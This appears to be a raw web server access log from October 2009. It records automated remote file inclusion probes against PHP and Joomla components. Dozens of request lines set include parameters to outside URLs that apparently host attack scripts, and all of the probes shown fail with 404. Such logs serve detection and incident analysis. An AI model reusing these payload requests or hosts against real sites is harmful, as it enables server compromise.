82.193.15.3 - - [17/Oct/2009:05:16:26 -0400] "GET /logs/error_log.Q109090400%20%20//include/mail.inc.php?skin_board_path=http://ssdnb.net//bbs//zfxid1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
89.108.122.160 - - [17/Oct/2009:05:16:26 -0400] "GET /contenido.php?sec=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
89.108.122.160 - - [17/Oct/2009:05:16:26 -0400] "GET /logs/contenido.php?sec=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
89.108.122.160 - - [17/Oct/2009:05:16:26 -0400] "GET /logs/error_log.Q109092600%20%20/contenido.php?sec=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
89.108.122.160 - - [17/Oct/2009:05:16:26 -0400] "GET /logs/access_log.Q109082800%20%20/contenido.php?sec=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
89.108.122.160 - - [17/Oct/2009:05:16:26 -0400] "GET /contenido.php?sec=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
89.108.122.160 - - [17/Oct/2009:05:16:26 -0400] "GET /logs/contenido.php?sec=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
89.108.122.160 - - [17/Oct/2009:05:16:26 -0400] "GET /logs/error_log.Q109092600%20%20/contenido.php?sec=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
89.108.122.160 - - [17/Oct/2009:05:16:26 -0400] "GET /logs/access_log.Q109082800%20%20/contenido.php?sec=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
89.108.122.160 - - [17/Oct/2009:05:16:27 -0400] "GET /logs/contenido.php?sec=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
89.108.122.160 - - [17/Oct/2009:05:16:27 -0400] "GET /logs/error_log.Q109092600%20%20/contenido.php?sec=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
89.108.122.160 - - [17/Oct/2009:05:16:27 -0400] "GET /contenido.php?sec=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
89.108.122.160 - - [17/Oct/2009:05:16:27 -0400] "GET /logs/access_log.Q109082800%20%20/contenido.php?sec=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
77.242.37.212 - - [17/Oct/2009:05:16:41 -0400] "GET /logs/access_log.Q109051600%20%20//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.powervictory.org//data/nGagLiks/zfxid1.txt? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
209.59.12.99 - - [17/Oct/2009:05:17:40 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
58.103.125.14 - - [17/Oct/2009:05:17:52 -0400] "GET /setup.php?setup[use_category]=1&dir=http://www.fmmkor.org/zboard/data/com_sef/1.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
58.103.125.14 - - [17/Oct/2009:05:17:53 -0400] "GET /logs/setup.php?setup[use_category]=1&dir=http://www.fmmkor.org/zboard/data/com_sef/1.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
58.103.125.14 - - [17/Oct/2009:05:18:01 -0400] "GET /logs/access_log.Q109081400/setup.php?setup[use_category]=1&dir=http://www.fmmkor.org/zboard/data/com_sef/1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
218.27.203.107 - - [17/Oct/2009:05:18:29 -0400] "GET /logs/access_log.Q109091900//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
218.219.198.195 - - [17/Oct/2009:05:18:32 -0400] "GET /logs/error_log.Q109092400/components/com_virtuemart/admin.virtuemart.php?mosConfig_absolute_path=http://www.ownzz.netai.net/idzim?? HTTP/1.1" 404 270 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
128.121.225.12 - - [17/Oct/2009:05:18:38 -0400] "GET //components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://messenger.bplaced.net/id.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
128.121.225.12 - - [17/Oct/2009:05:18:38 -0400] "GET /logs/access_log.Q109072200//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://messenger.bplaced.net/id.txt??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
128.121.225.12 - - [17/Oct/2009:05:18:38 -0400] "GET /logs//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://messenger.bplaced.net/id.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
128.121.225.12 - - [17/Oct/2009:05:18:40 -0400] "GET /logs/access_log.Q109091700//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://messenger.bplaced.net/id.txt??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
218.219.198.195 - - [17/Oct/2009:05:18:42 -0400] "GET /components/com_virtuemart/admin.virtuemart.php?mosConfig_absolute_path=http://www.ownzz.netai.net/idzim?? HTTP/1.1" 404 244 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
70.38.54.146 - - [17/Oct/2009:05:19:15 -0400] "GET /logs/access_log.Q109072900//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.eggsactrace.com/mambo/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
70.38.54.146 - - [17/Oct/2009:05:19:16 -0400] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.eggsactrace.com/mambo/safe.txt?? HTTP/1.1" 404 253 "-" "libwww-perl/5.805"
69.175.14.162 - - [17/Oct/2009:05:20:26 -0400] "GET /logs/access_log.Q109052900%20%20/errors.php?error=http://www.specialforcessquadron.com/newsite/arcade/copyright.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
70.38.54.146 - - [17/Oct/2009:05:20:28 -0400] "GET /logs/error_log.Q109072900//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.eggsactrace.com/mambo/safe.txt?? HTTP/1.1" 404 274 "-" "libwww-perl/5.805"
218.219.198.195 - - [17/Oct/2009:05:20:37 -0400] "GET /logs/access_log.Q109081900/components/com_virtuemart/admin.virtuemart.php?mosConfig_absolute_path=http://www.ownzz.netai.net/idzim?? HTTP/1.1" 404 271 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
122.153.32.10 - - [17/Oct/2009:05:20:40 -0400] "GET /contenido.php?sec=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
122.153.32.10 - - [17/Oct/2009:05:20:40 -0400] "GET /logs/error_log.Q109092600%20%20/contenido.php?sec=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
122.153.32.10 - - [17/Oct/2009:05:20:40 -0400] "GET /logs/contenido.php?sec=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
93.190.49.3 - - [17/Oct/2009:05:20:42 -0400] "GET /logs/access_log.Q109051400/errors.php?error=http://mail.metalwrks.com/shar/id1?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
122.153.32.10 - - [17/Oct/2009:05:20:50 -0400] "GET /logs/access_log.Q109082800%20%20/contenido.php?sec=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
93.190.49.3 - - [17/Oct/2009:05:21:01 -0400] "GET /logs/access_log.Q109051800/errors.php?error=http://mail.metalwrks.com/shar/id1?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
77.222.131.59 - - [17/Oct/2009:05:21:25 -0400] "GET /modules/My_eGallery/index.php?basepath=http://www.hostmann-steinberg.ru/sape?%0D? HTTP/1.1" 404 227 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
77.222.131.59 - - [17/Oct/2009:05:21:25 -0400] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.hostmann-steinberg.ru/sape?%0D? HTTP/1.1" 404 232 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
77.222.131.59 - - [17/Oct/2009:05:21:25 -0400] "GET /logs/access_log.Q109052500/modules/My_eGallery/index.php?basepath=http://www.hostmann-steinberg.ru/sape?%0D? HTTP/1.1" 404 254 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
77.222.131.59 - - [17/Oct/2009:05:21:28 -0400] "GET /logs/access_log.Q109052200/modules/My_eGallery/index.php?basepath=http://www.hostmann-steinberg.ru/sape?%0D? HTTP/1.1" 404 254 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
218.27.203.107 - - [17/Oct/2009:05:21:37 -0400] "GET ////components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
218.27.203.107 - - [17/Oct/2009:05:21:37 -0400] "GET /logs////components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
67.192.124.144 - - [17/Oct/2009:05:21:38 -0400] "GET /logs/access_log.Q109051400/errors.php?error=http://mail.metalwrks.com/shar/id1?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
67.192.124.144 - - [17/Oct/2009:05:21:38 -0400] "GET /logs/access_log.Q109092600/errors.php?error=http://mail.metalwrks.com/shar/id1?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
218.27.203.107 - - [17/Oct/2009:05:21:40 -0400] "GET /logs/access_log.Q109062000////components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
94.75.245.36 - - [17/Oct/2009:05:22:05 -0400] "GET /logs/access_log.Q109052500/modules/My_eGallery/index.php?basepath=http://www.hostmann-steinberg.ru/sape?%0D? HTTP/1.1" 404 254 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
123.125.66.121 - - [17/Oct/2009:05:22:07 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
94.75.245.36 - - [17/Oct/2009:05:22:08 -0400] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.hostmann-steinberg.ru/sape?%0D? HTTP/1.1" 404 232 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
94.75.245.36 - - [17/Oct/2009:05:22:08 -0400] "GET /modules/My_eGallery/index.php?basepath=http://www.hostmann-steinberg.ru/sape?%0D? HTTP/1.1" 404 227 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
94.75.245.36 - - [17/Oct/2009:05:22:08 -0400] "GET /logs/access_log.Q109052200/modules/My_eGallery/index.php?basepath=http://www.hostmann-steinberg.ru/sape?%0D? HTTP/1.1" 404 254 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
218.27.203.107 - - [17/Oct/2009:05:22:18 -0400] "GET /logs/access_log.Q109071200////components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
32.135.246.53 - - [17/Oct/2009:05:22:29 -0400] "GET /images/monthly_specials.jpg HTTP/1.1" 200 73909 "-" "Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_1_2 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko)"
218.219.198.195 - - [17/Oct/2009:05:22:33 -0400] "GET /logs/components/com_virtuemart/admin.virtuemart.php?mosConfig_absolute_path=http://www.supliment.polirom.ro/brd/id1.gif?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
218.219.198.195 - - [17/Oct/2009:05:22:38 -0400] "GET /components/com_virtuemart/admin.virtuemart.php?mosConfig_absolute_path=http://www.supliment.polirom.ro/brd/id1.gif?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
209.59.12.99 - - [17/Oct/2009:05:22:40 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
90.185.249.111 - - [17/Oct/2009:05:22:46 -0400] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://tracyjoy.com/vnc/id1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
90.185.249.111 - - [17/Oct/2009:05:22:46 -0400] "GET /logs/error_log.Q109060900%20%20//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://tracyjoy.com/vnc/id1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
90.185.249.111 - - [17/Oct/2009:05:22:46 -0400] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://tracyjoy.com/vnc/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
89.108.122.160 - - [17/Oct/2009:05:23:15 -0400] "GET /logs/error_log.Q109092600/contenido.php?sec=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
89.108.122.160 - - [17/Oct/2009:05:23:15 -0400] "GET /logs/access_log.Q109082800/contenido.php?sec=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
89.108.122.160 - - [17/Oct/2009:05:23:36 -0400] "GET /logs/error_log.Q109092600/contenido.php?sec=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
89.108.122.160 - - [17/Oct/2009:05:23:36 -0400] "GET /logs/access_log.Q109082800/contenido.php?sec=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
89.108.122.160 - - [17/Oct/2009:05:23:49 -0400] "GET /logs/error_log.Q109092600/contenido.php?sec=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
89.108.122.160 - - [17/Oct/2009:05:23:49 -0400] "GET /logs/access_log.Q109082800/contenido.php?sec=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
93.190.49.3 - - [17/Oct/2009:05:24:13 -0400] "GET //modules/xfsection/modify.php?dir_module=http://mail.metalwrks.com/shar/id1?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
93.190.49.3 - - [17/Oct/2009:05:24:13 -0400] "GET /logs//modules/xfsection/modify.php?dir_module=http://mail.metalwrks.com/shar/id1?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
220.181.7.67 - - [17/Oct/2009:05:24:17 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
93.190.49.3 - - [17/Oct/2009:05:24:23 -0400] "GET /logs/access_log.Q109051500//modules/xfsection/modify.php?dir_module=http://mail.metalwrks.com/shar/id1?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
125.251.147.194 - - [17/Oct/2009:05:24:25 -0400] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
125.251.147.194 - - [17/Oct/2009:05:24:25 -0400] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
125.251.147.194 - - [17/Oct/2009:05:24:25 -0400] "GET /logs/access_log.Q109080200%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
125.251.147.194 - - [17/Oct/2009:05:24:43 -0400] "GET /logs/error_log.Q109080200%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
222.231.3.138 - - [17/Oct/2009:05:25:15 -0400] "GET /logs/access_log.Q109071100//index.php?base_dir=http://www.eminlife.com/rss/fx29id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
218.219.198.195 - - [17/Oct/2009:05:26:01 -0400] "GET /components/com_virtuemart/admin.virtuemart.php?mosConfig_absolute_path=http://www.ownzz.netai.net/idzim?? HTTP/1.1" 404 244 "-" "libwww-perl/5.79"
95.211.6.161 - - [17/Oct/2009:05:26:05 -0400] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
95.211.6.161 - - [17/Oct/2009:05:26:05 -0400] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
95.211.6.161 - - [17/Oct/2009:05:26:05 -0400] "GET /logs/access_log.Q109080200%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
218.219.198.195 - - [17/Oct/2009:05:26:09 -0400] "GET /logs/components/com_virtuemart/admin.virtuemart.php?mosConfig_absolute_path=http://www.ownzz.netai.net/idzim?? HTTP/1.1" 404 249 "-" "libwww-perl/5.79"
94.102.6.154 - - [17/Oct/2009:05:26:09 -0400] "GET /phphtml.php?htmlclass_path=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
94.102.6.154 - - [17/Oct/2009:05:26:09 -0400] "GET /logs/access_log.Q109052300/phphtml.php?htmlclass_path=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
94.102.6.154 - - [17/Oct/2009:05:26:10 -0400] "GET /logs/phphtml.php?htmlclass_path=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
94.102.6.154 - - [17/Oct/2009:05:26:11 -0400] "GET /logs/access_log.Q109052300%20%20/phphtml.php?htmlclass_path=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
94.102.6.154 - - [17/Oct/2009:05:26:11 -0400] "GET /phphtml.php?htmlclass_path=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
94.102.6.154 - - [17/Oct/2009:05:26:11 -0400] "GET /logs/phphtml.php?htmlclass_path=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
94.102.6.154 - - [17/Oct/2009:05:26:11 -0400] "GET /logs/phphtml.php?htmlclass_path=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
94.102.6.154 - - [17/Oct/2009:05:26:11 -0400] "GET /logs/access_log.Q109052300/phphtml.php?htmlclass_path=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
95.211.6.161 - - [17/Oct/2009:05:26:11 -0400] "GET /logs/error_log.Q109080200%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
94.102.6.154 - - [17/Oct/2009:05:26:13 -0400] "GET /phphtml.php?htmlclass_path=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
94.102.6.154 - - [17/Oct/2009:05:26:13 -0400] "GET /logs/phphtml.php?htmlclass_path=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
94.102.6.154 - - [17/Oct/2009:05:26:16 -0400] "GET /phphtml.php?htmlclass_path=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
94.102.6.154 - - [17/Oct/2009:05:26:16 -0400] "GET /logs/access_log.Q109052400/phphtml.php?htmlclass_path=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
69.175.14.162 - - [17/Oct/2009:05:26:17 -0400] "GET /logs/access_log.Q109093000//frame.php?framefile=http://www.specialforcessquadron.com/newsite/arcade/copyright.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
94.102.6.154 - - [17/Oct/2009:05:26:18 -0400] "GET /logs/access_log.Q109052300%20%20/phphtml.php?htmlclass_path=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
94.102.6.154 - - [17/Oct/2009:05:26:19 -0400] "GET /logs/access_log.Q109052400%20%20/phphtml.php?htmlclass_path=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
218.27.203.107 - - [17/Oct/2009:05:26:20 -0400] "GET /logs/access_log.Q109062000%20%20////components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
94.102.6.154 - - [17/Oct/2009:05:26:25 -0400] "GET /logs/access_log.Q109052400/phphtml.php?htmlclass_path=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
94.102.6.154 - - [17/Oct/2009:05:26:25 -0400] "GET /logs/access_log.Q109052400%20%20/phphtml.php?htmlclass_path=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
218.219.198.195 - - [17/Oct/2009:05:26:41 -0400] "GET /logs/access_log.Q109081900/components/com_virtuemart/admin.virtuemart.php?mosConfig_absolute_path=http://www.supliment.polirom.ro/brd/id1.gif?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
69.175.14.162 - - [17/Oct/2009:05:26:46 -0400] "GET /logs/access_log.Q109052500//frame.php?framefile=http://www.specialforcessquadron.com/newsite/arcade/copyright.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
218.27.203.107 - - [17/Oct/2009:05:26:58 -0400] "GET /logs/access_log.Q109071200%20%20////components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
77.242.37.212 - - [17/Oct/2009:05:27:30 -0400] "GET /logs/access_log.Q109062100//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.powervictory.org//data/nGagLiks/zfxid1.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
209.59.12.99 - - [17/Oct/2009:05:27:40 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
82.151.132.176 - - [17/Oct/2009:05:27:40 -0400] "GET //inc/content.inc.php?sIncPath=http://dubnahome.ru//one.txt? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
82.151.132.176 - - [17/Oct/2009:05:27:40 -0400] "GET /logs//inc/content.inc.php?sIncPath=http://dubnahome.ru//one.txt? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
67.192.124.144 - - [17/Oct/2009:05:27:42 -0400] "GET /logs/access_log.Q109051800/errors.php?error=http://mail.metalwrks.com/shar/id1?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
66.249.71.230 - - [17/Oct/2009:05:27:17 -0400] "GET /logs/access_log.Q109051500 HTTP/1.1" 200 6117848 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
77.242.37.212 - - [17/Oct/2009:05:27:51 -0400] "GET /logs/access_log.Q109051600//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.powervictory.org//data/nGagLiks/zfxid1.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
218.219.198.195 - - [17/Oct/2009:05:27:59 -0400] "GET /logs/access_log.Q109081900/components/com_virtuemart/admin.virtuemart.php?mosConfig_absolute_path=http://www.ownzz.netai.net/idzim?? HTTP/1.1" 404 271 "-" "libwww-perl/5.79"
82.151.132.176 - - [17/Oct/2009:05:28:20 -0400] "GET /logs/access_log.Q109060900%20%20//inc/content.inc.php?sIncPath=http://dubnahome.ru//one.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
72.30.78.230 - - [17/Oct/2009:05:28:23 -0400] "GET /logs/access_log.Q109100900 HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
94.102.6.154 - - [17/Oct/2009:05:29:10 -0400] "GET /phphtml.php?htmlclass_path=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
94.102.6.154 - - [17/Oct/2009:05:29:10 -0400] "GET /logs/phphtml.php?htmlclass_path=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
94.102.6.154 - - [17/Oct/2009:05:29:10 -0400] "GET /logs/access_log.Q109052300/phphtml.php?htmlclass_path=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
94.102.6.154 - - [17/Oct/2009:05:29:25 -0400] "GET /logs/access_log.Q109052400/phphtml.php?htmlclass_path=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
66.249.71.152 - - [17/Oct/2009:05:29:27 -0400] "GET /robots.txt HTTP/1.1" 404 208 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.152 - - [17/Oct/2009:05:29:27 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
94.23.2.21 - - [17/Oct/2009:05:29:45 -0400] "GET //citywriter/head.php?path=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
94.23.2.21 - - [17/Oct/2009:05:29:45 -0400] "GET /logs/access_log.Q109091000//citywriter/head.php?path=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
94.23.2.21 - - [17/Oct/2009:05:29:45 -0400] "GET /logs//citywriter/head.php?path=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
94.23.2.21 - - [17/Oct/2009:05:29:45 -0400] "GET //citywriter/head.php?path=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
94.23.2.21 - - [17/Oct/2009:05:29:45 -0400] "GET /logs/access_log.Q109091000//citywriter/head.php?path=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
94.23.2.21 - - [17/Oct/2009:05:29:45 -0400] "GET /logs//citywriter/head.php?path=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
94.23.2.21 - - [17/Oct/2009:05:29:48 -0400] "GET //citywriter/head.php?path=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
94.23.2.21 - - [17/Oct/2009:05:29:48 -0400] "GET /logs/access_log.Q109091000%20%20//citywriter/head.php?path=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
